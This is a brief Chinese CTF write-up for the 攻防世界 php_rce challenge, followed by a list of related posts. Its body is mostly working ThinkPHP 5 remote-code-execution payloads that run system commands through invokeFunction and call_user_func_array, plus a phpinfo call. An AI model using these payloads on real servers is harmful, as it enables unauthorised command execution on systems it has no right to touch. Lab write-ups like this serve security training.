攻防世界web高阶(php rce)
2020-07-16 10:40
197 查看
需要自己百度下thinkphp5的漏洞(其实看完就知道怎么做这个题目了)
payload:
s=index/think\App/invokeFunction&function=call_user_func_array&vars[0]=system&vars[1][]=find / -name “*flag” 先查找关于flag在哪
s=index/think\App/invokeFunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag 看flag
利用system函数远命令执行:
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
2.通过phpinfo函数写出phpinfo()的信息
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
相关文章推荐
- php_rce 攻防世界xctf web
- 攻防世界web进阶区php_rce--Thinkphp5.x命令执行漏洞
- 攻防世界web---php_rce
- 攻防世界 Web_php_include 解题思路
- 攻防世界 web php_rce emmm
- 攻防世界-Web_php_include
- 攻防世界-Web_php_include (四种解法)
- 攻防世界 php_rce 解题思路
- 攻防世界 Web simple_php 简单php弱类型题
- 攻防世界-web php include
- [wp] 攻防世界 Web_php_wrong_nginx_config
- 攻防世界web进阶区PHP2
- [wp] 攻防世界 Web_php_include
- 攻防世界高阶之php_rce
- 攻防世界web进阶PHP2详解
- Web_php_include攻防世界xctf web
- 攻防世界web进阶区Web_php_unserialize,序列化大详解
- 攻防世界xctf web Web_php_unserialize和warmup
- XCTF攻防世界web新手练习_ 10_simple_php
- 攻防世界web PHP2 writeup